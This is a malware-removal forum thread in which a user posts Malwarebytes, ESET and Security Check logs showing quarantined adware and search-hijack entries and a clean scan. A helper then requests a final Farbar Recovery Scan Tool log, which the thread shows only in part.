PUP.Optional.WinYahoo, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TopResultURLFallback, https://uk.search.ya...={searchTerms},%4, %5

PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE|OSID, 6.2, Quarantined, [c9de77e74d4c4aec1a155797ed1625db]

PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE|AdvertsLink1, http://dl.softserver...3/DriverPro.exe, Quarantined, [3e693b23cbce3402012de8063cc7728e]

PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE|AdvertsLink2, http://dl.softserver...LiveSupport.exe, Quarantined, [297e91cd267363d379b531bd689b5da3]

 

Registry Data: 2

PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://uk.search.ya...=1&param2=fBad:(https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]D1%26bBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]DIE%26ccBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]Dgb%26paBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]DWincy%26cdBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26crBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]D167945445%26aBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]Dwncy_mdaffmarmarie_16_03%26os_verBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]D6.3%26osBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[fbacc19d8613c76feab0f7e6b84cc040]DWindowsGood: (www.google.com)B8.1Good: (www.google.com)BPro, %4, %5

PUP.Optional.WinYahoo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, https://uk.search.ya...=1&param2=fBad:(https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]D1%26bBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]DIE%26ccBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]Dgb%26paBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]DWincy%26cdBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26crBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]D167945445%26aBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]Dwncy_mdaffmarmarie_16_03%26os_verBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]D6.3%26osBad: (https://uk.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_mdaffmarmarie_16_03&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dgb%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyDzztBtD0BtC0DzzyD0D0C0DtByDyDtBtN0D0Tzu0StCyEzztBtN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyDtBtCyByB0DyByEtGyByC0A0AtG0B0EyBtDtGtC0F0AtBtG0B0CyBzztB0FtC0F0DtDyD0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzytD0BtBtByD0B0BtGyEtA0BtCtGyEyCyE0AtGzzzy0BtCtGzz0B0B0A0DtD0E0C0F0E0Czz2QtN0A0LzutB%26cr%3D167945445%26a%3Dwncy_mdaffmarmarie_16_03%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BPro),Replaced,[099e70eeb1e81d192a707f5e35cf34cc]DWindowsGood: (www.google.com)B8.1Good: (www.google.com)BPro, %4, %5

 

Folders: 0

(No malicious items detected)

 

Files: 0

(No malicious items detected)

 

Physical Sectors: 0

(No malicious items detected)

 

 

(end)

[moles926]

ESETSmartInstaller@High as downloader log:

all ok

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# EOSSerial=fb2f154af158a64a9f0a6921ab510bfe

# end=init

# utc_time=2016-02-09 05:35:10

# local_time=2016-02-09 05:35:10 (+0000, GMT Standard Time)

# country="United Kingdom"

# osver=6.2.9200 NT 

Update Init

Update Download

Update Init

Update Download

Update Finalize

Updated modules version: 28048

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# EOSSerial=fb2f154af158a64a9f0a6921ab510bfe

# end=updated

# utc_time=2016-02-09 05:38:29

# local_time=2016-02-09 05:38:29 (+0000, GMT Standard Time)

# country="United Kingdom"

# osver=6.2.9200 NT 

# product=EOS

# version=8

# OnlineScannerApp.exe=1.0.0.1

# OnlineScanner.ocx=1.0.0.7777

# api_version=3.1.1

# EOSSerial=fb2f154af158a64a9f0a6921ab510bfe

# engine=28048

# end=stopped

# remove_checked=false

# archives_checked=true

# unwanted_checked=true

# unsafe_checked=true

# antistealth_checked=true

# utc_time=2016-02-09 05:45:14

# local_time=2016-02-09 05:45:14 (+0000, GMT Standard Time)

# country="United Kingdom"

# lang=1033

# osver=6.2.9200 NT 

# compatibility_mode_1=''

# compatibility_mode=5893 16776573 100 94 21517 10819681 0 0

# scanned=10410

# found=0

# cleaned=0

# scan_time=404

[moles926]

 Results of screen317's Security Check version 1.014 --- 12/23/15  

   x64 (UAC is enabled)  

 Internet Explorer 11  

``````````````Antivirus/Firewall Check:`````````````` 

 Windows Firewall Enabled!  

Windows Defender   

 WMI entry may not exist for antivirus; attempting automatic update. 

`````````Anti-malware/Other Utilities Check:````````` 

 Google Chrome (48.0.2564.103) 

 Google Chrome (48.0.2564.97) 

````````Process Check: objlist.exe by Laurent````````  

 Windows Defender MSMpEng.exe 

 Malwarebytes Anti-Malware mbamservice.exe  

 Malwarebytes Anti-Malware mbam.exe  

 Molly Poole Desktop Malwarebytes Anti-Malware mbamscheduler.exe 

 Windows Defender MpCmdRun.exe   

`````````````````System Health check````````````````` 

 Total Fragmentation on Drive C:  % 

````````````````````End of Log`````````````````````` 

[pystryker]

Hello

Looks like a clean bill of health. Let's run one last scan with FRST to make sure everything is clear.


Step 1: Fresh FRST Scan

• Start Farbar's Recovery Scan Tool and press the Scan button.
• FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST.txt Log

Addition.txt Log

[moles926]

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:07-02-2016

Ran by Molly Poole (administrator) on POOLE-PC (09-02-2016 21:10:56)

Running from D:\Users\Molly Poole\Desktop

Loaded Profiles: Molly Poole & Molly (Available Profiles: Molly Poole & Molly)

Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)

Internet Explorer Version 11 (Default browser: Chrome)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe

(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\dgnsvc.exe

(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe

(Malwarebytes) D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes) D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbamservice.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mepService.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\epson\MyEpson Portal\mep.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe

(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMSvcHost.exe

(Nuance Communications, Inc.) C:\Program Files (x86)\Common Files\Nuance\loggerservice.exe

(Malwarebytes) D:\Users\Molly Poole\Desktop\Malwarebytes Anti-Malware\mbam.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Intel Corporation) C:\Windows\System32\igfxEM.exe

(Intel Corporation) C:\Windows\System32\igfxHK.exe

() C:\Windows\System32\igfxTray.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe

(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe

(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE

(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\agent.exe

(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_YATINEE.EXE

(Flexera Software LLC.) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe

() C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\CSISYNCCLIENT.EXE

(Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE

(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe

(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe

(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Farbar) D:\Users\Molly Poole\Desktop\FRST64 (1).exe

 

 

==================== Registry (Whitelisted) ===========================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8444632 2015-08-04] (Realtek Semiconductor)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2817776 2014-04-11] (Synaptics Incorporated)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-09] (Apple Inc.)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60688 2015-11-20] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)

